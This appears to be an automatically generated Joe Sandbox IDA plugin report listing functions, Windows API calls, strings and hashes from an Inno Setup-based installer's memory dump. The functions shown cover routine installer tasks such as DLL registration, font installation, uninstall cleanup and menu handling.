Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
String ID: CreateEvent$TransactNamedPipe
API String ID: 2182916169-3012584893
Opcode ID: 98c2342ffc13102a86a2f4ad38db514fb9186628fbfdf3c783b7ad9eec6d73f4
Instruction ID: b755420f5ccc64554a28e8d5f72de5b6a69c50c517f2f1d69fd7c456eb535d6c
Opcode Fuzzy Hash: 98c2342ffc13102a86a2f4ad38db514fb9186628fbfdf3c783b7ad9eec6d73f4
Instruction Fuzzy Hash: 4A417371A00608EFDB15DF95CD81F9EB7F9EB48715F10406AF904E7292DA789E44CB28

Function 00456DC8 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456F2D,?,?,00000031,?), ref: 00456DF0
GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456DF6
LoadTypeLib.OLEAUT32(00000000,?), ref: 00456E43

Part of subcall function 00453510: GetLastError.KERNEL32(00000000,004540A5,00000005,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D,00000000), ref: 00453513

Strings

OLEAUT32.DLL, xrefs: 00456DEB
LoadTypeLib, xrefs: 00456E4E
UnRegisterTypeLib, xrefs: 00456DE6
ITypeLib::GetLibAttr, xrefs: 00456E79
GetProcAddress, xrefs: 00456E03
UnRegisterTypeLib, xrefs: 00456EAF

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressErrorHandleLastLoadModuleProcType
String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
API String ID: 1914119943-2711329623
Opcode ID: 7b1ec654037b0c607dfe6d04a3082381f0cbc5cf9cb070b5b8bf219295e165cb
Instruction ID: 2b224e74544e423aed3b5227b18181137566e670263372cbc00570a3e14d3cd7
Opcode Fuzzy Hash: 7b1ec654037b0c607dfe6d04a3082381f0cbc5cf9cb070b5b8bf219295e165cb
Instruction Fuzzy Hash: 2B319275A00504AFDB11EFAACC42D5FB7BEEB89705752846AF804D3652DA38DD04CB28

Function 0042E428 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047EB60,00000000), ref: 0042E451
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047EB60,00000000), ref: 0042E4A5

Strings

kernel32.dll, xrefs: 0042E44C
Control Panel\Desktop\ResourceLocale, xrefs: 0042E4B4
Locale, xrefs: 0042E494
GetUserDefaultUILanguage, xrefs: 0042E447
.DEFAULT\Control Panel\International, xrefs: 0042E47C

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 1af4437276b931ae032a2a4a3ca7a17fb9f1546afc1d5d26d282f18a110b0504
Instruction ID: 3fe9fe372c4d794b24d5987f6434f9a2f248a379bc076d0360e6e1ac237d63e0
Opcode Fuzzy Hash: 1af4437276b931ae032a2a4a3ca7a17fb9f1546afc1d5d26d282f18a110b0504
Instruction Fuzzy Hash: 16216430B10219BBCB10EAF7DC45A9E77A8EB04308FA04877A500E7281EB7CDE459B5D

Function 00416D90 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(?,?), ref: 00416E23
SaveDC.GDI32(?), ref: 00416E37
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
RestoreDC.GDI32(?,?), ref: 00416E75
CreateSolidBrush.GDI32(00000000), ref: 00416EF5
FrameRect.USER32(?,?,?), ref: 00416F28
DeleteObject.GDI32(?), ref: 00416F32
CreateSolidBrush.GDI32(00000000), ref: 00416F42
FrameRect.USER32(?,?,?), ref: 00416F75
DeleteObject.GDI32(?), ref: 00416F7F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: db6c70493318213a3b2cdd544b125370fd54b269ad31cfd686a9519e7a86e3c4
Instruction ID: c727efbf8946963a4c0451e641fd5f3f57076e2c2b79ed229a1c60f75d7412ee
Opcode Fuzzy Hash: db6c70493318213a3b2cdd544b125370fd54b269ad31cfd686a9519e7a86e3c4
Instruction Fuzzy Hash: A0513AB12047455FDB50EF69C8C4B9B77E8AF48314F1546AAFD488B286C738EC81CB99

Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
GetFileType.KERNEL32(?,000000F5), ref: 00404C11
CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
GetLastError.KERNEL32(000000F5), ref: 00404C46

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D

Function 004221F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 00422243
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: b2f1750b03ba79d273c55ca6812263c276687b20c7bac49dc024d7f30c6f7dfa
Instruction ID: efa19709b170cd1c2d0de868379c086f5835f405e594c588ded1d161c250978f
Opcode Fuzzy Hash: b2f1750b03ba79d273c55ca6812263c276687b20c7bac49dc024d7f30c6f7dfa
Instruction Fuzzy Hash: 112124703807447AE720E725CD8BF9B7BD89B04718F5440A9BA48BF2D3C6F9AA40865C

Function 00481D38 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175windowCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(10000000), ref: 00481EF5
FreeLibrary.KERNEL32(00000000), ref: 00481F09
SendNotifyMessageA.USER32(00020434,00000496,00002710,00000000), ref: 00481F7B

Strings

DeinitializeSetup, xrefs: 00481DF1
Restarting Windows., xrefs: 00481F56
Not restarting Windows because Setup is being run from the debugger., xrefs: 00481F2A
Deinitializing Setup., xrefs: 00481D56
GetCustomSetupExitCode, xrefs: 00481D95

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FreeLibrary$MessageNotifySend
String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
API String ID: 3817813901-1884538726
Opcode ID: c898f3fadde3ff7955209d5f4aceb7b29c199a3380d9c61b05ec390ed495ea4d
Instruction ID: 9e00769445d4a0c849b2d818ef4b464354af313f5be9db4beddfa23a64d09d3b
Opcode Fuzzy Hash: c898f3fadde3ff7955209d5f4aceb7b29c199a3380d9c61b05ec390ed495ea4d
Instruction Fuzzy Hash: 0C518031A04200AFD715EF69D845B5E7BA8EB19318F50887BF905C72B1D738A845CB59

Function 00461734 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 0046176F
GetActiveWindow.USER32 ref: 004617D3
CoInitialize.OLE32(00000000), ref: 004617E7
SHBrowseForFolder.SHELL32(?), ref: 004617FE
CoUninitialize.OLE32(0046183F,00000000,?,?,?,?,?,00000000,004618C3), ref: 00461813
SetActiveWindow.USER32(?,0046183F,00000000,?,?,?,?,?,00000000,004618C3), ref: 00461829
SetActiveWindow.USER32(?,?,0046183F,00000000,?,?,?,?,?,00000000,004618C3), ref: 00461832

Strings

A, xrefs: 004617A7

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
String ID: A
API String ID: 2684663990-3554254475
Opcode ID: c8a2995f1564064eb5a34001aee608c8ce9a85b4cfccd82670955085ca8b405e
Instruction ID: ed33581d6f83e257b2021294155b7b183ce5e349162e4ad67cdd841697ea343d
Opcode Fuzzy Hash: c8a2995f1564064eb5a34001aee608c8ce9a85b4cfccd82670955085ca8b405e
Instruction Fuzzy Hash: DD31F0B1E00248AFDB11EFA6D885A9EBBF8EB09304F55447BF804E7251E7785A04CB59

Function 00472BF4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00472CB5,?,?,?,00000008,00000000,00000000,00000000,?,00472F11,?,?,00000000,00473194), ref: 00472C18

Part of subcall function 0042CDA4: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE1A

Part of subcall function 00406F60: DeleteFileA.KERNEL32(00000000,0049C628,00498DC9,00000000,00498E1E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F6B

SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472CB5,?,?,?,00000008,00000000,00000000,00000000,?,00472F11), ref: 00472C8F
RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472CB5,?,?,?,00000008,00000000,00000000,00000000), ref: 00472C95

Strings

desktop.ini, xrefs: 00472C2C
{0AFACED1-E828-11D1-9187-B532F1E9575D}, xrefs: 00472C51
target.lnk, xrefs: 00472C6D
CLSID2, xrefs: 00472C42
.ShellClassInfo, xrefs: 00472C47

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
API String ID: 884541143-1710247218
Opcode ID: 66cca181f9b721833913324fb941b36821abb62f62904710aeac79635de6a3b1
Instruction ID: 65975e4bd8cd76c9bb0fe38812e038ff2f06eb36f2e037c13b6dabf628133507
Opcode Fuzzy Hash: 66cca181f9b721833913324fb941b36821abb62f62904710aeac79635de6a3b1
Instruction Fuzzy Hash: 9511D0307005147FD712EA759E82B9E76ACDB59714F61853BB804A72C1DBBCAE02866C

Function 0045D35C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D365
GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D375
GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D385
GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D395

Strings

inflateEnd, xrefs: 0045D37F
inflate, xrefs: 0045D36F
inflateReset, xrefs: 0045D38F
inflateInit_, xrefs: 0045D35F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc
String ID: inflate$inflateEnd$inflateInit_$inflateReset
API String ID: 190572456-3516654456
Opcode ID: dc90f1f262602021e393954f48f97557164b85cd901e8b5ff6cac9b118bc13cf
Instruction ID: a094d50e791027cbd3930c6bcb0dd8b00ad2176992dcb97735ddb1afc71f87fe
Opcode Fuzzy Hash: dc90f1f262602021e393954f48f97557164b85cd901e8b5ff6cac9b118bc13cf
Instruction Fuzzy Hash: 170128B0D00700DAE324DF36AC4272636A5EFA430EF14903BAD48962B7D779485B9A2D

Function 0041A8EC Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?,00000000), ref: 0041A9C9
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041AA03
SetBkColor.GDI32(?,?), ref: 0041AA18
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
SetBkColor.GDI32(00000000,?), ref: 0041AAD3

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Color$StretchText
String ID:
API String ID: 2984075790-0
Opcode ID: 346bdf56f45da54f900b88fa69c46fff65611cbab2d21c5c69379b94b51b0a6c
Instruction ID: 3742fc556daaed9ad14d930c470d40cb5efd251a519f467f7f8e710c3ba79c5e
Opcode Fuzzy Hash: 346bdf56f45da54f900b88fa69c46fff65611cbab2d21c5c69379b94b51b0a6c
Instruction Fuzzy Hash: A561E5B5A00105EFCB40EFA9D985E9ABBF8EF08314B108166F518DB261CB34ED50CF99

Function 0045816C Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7

CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458320,?, /s ",?,regsvr32.exe",?,00458320), ref: 00458292

Strings

regsvr32.exe", xrefs: 004581B3
0x%x, xrefs: 004582B5
Spawning 32-bit RegSvr32: , xrefs: 00458219
CreateProcess, xrefs: 00458284
D, xrefs: 00458248
Spawning 64-bit RegSvr32: , xrefs: 004581F7
/s ", xrefs: 004581DB
/u, xrefs: 004581CE

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseDirectoryHandleSystem
String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
API String ID: 2051275411-1862435767
Opcode ID: 094f14b588af688cd7db8b552fab67cbd0f69cfd9e563acb8ae8cd2159047a0a
Instruction ID: 3217153a075e29e22e4edd5f99a32045657764684ff44c5b21fe10df6120cd58
Opcode Fuzzy Hash: 094f14b588af688cd7db8b552fab67cbd0f69cfd9e563acb8ae8cd2159047a0a
Instruction Fuzzy Hash: 28411770A00308ABDB10EFD5C842BDEB7F9AF45705F50407FA904BB292DF799A098B59

Function 0044D1EC Relevance: 13.6, APIs: 9, Instructions: 90COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0044D21D
GetSysColor.USER32(00000014), ref: 0044D224
SetTextColor.GDI32(00000000,00000000), ref: 0044D23C
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D265
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D26F
GetSysColor.USER32(00000010), ref: 0044D276
SetTextColor.GDI32(00000000,00000000), ref: 0044D28E
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D2B7
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D2E2

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Text$Color$Draw$OffsetRect
String ID:
API String ID: 1005981011-0
Opcode ID: 0c9f13fdac39b7e8032be21cb884e4f523a93d5be2f974ed7a515f91e2df11ad
Instruction ID: bddce6b53f256ac6c171d17b767d3a31006e7acd236a538b09f11432ecbe9b7c
Opcode Fuzzy Hash: 0c9f13fdac39b7e8032be21cb884e4f523a93d5be2f974ed7a515f91e2df11ad
Instruction Fuzzy Hash: 6921AFB42015047FC710FB6ACD8AE8B7BDC9F19319B01857AB918EB392C678DE404669

Function 00496BCC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 004509A0: SetEndOfFile.KERNEL32(?,?,0045C3EA,00000000,0045C575,?,00000000,00000002,00000002), ref: 004509A7

Part of subcall function 00406F60: DeleteFileA.KERNEL32(00000000,0049C628,00498DC9,00000000,00498E1E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F6B

GetWindowThreadProcessId.USER32(00000000,?), ref: 00496C5D
OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496C71
SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00496C8B
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00496C97
CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00496C9D
Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00496CB0

Strings

Deleting Uninstall data files., xrefs: 00496BD3

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
String ID: Deleting Uninstall data files.
API String ID: 1570157960-2568741658
Opcode ID: 1ff474fed9ee097c96215d717bbe635fc8fb99da6ef0c3667258a19916fdf94b
Instruction ID: 97c3483cac018c5983fbae276c25bca061d0eb7c138ea963c76b2828a35483b6
Opcode Fuzzy Hash: 1ff474fed9ee097c96215d717bbe635fc8fb99da6ef0c3667258a19916fdf94b
Instruction Fuzzy Hash: A0215371704204BFEB11EB7AED42B263BA8D75975CF52443BB501971A2D67CAC01CB2D

Function 004703F4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004704F1,?,?,?,?,00000000), ref: 0047045B
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004704F1), ref: 00470472
AddFontResourceA.GDI32(00000000), ref: 0047048F
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004704A3

Strings

Failed to open Fonts registry key., xrefs: 00470479
Failed to set value in Fonts registry key., xrefs: 00470464
AddFontResource, xrefs: 004704AD

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
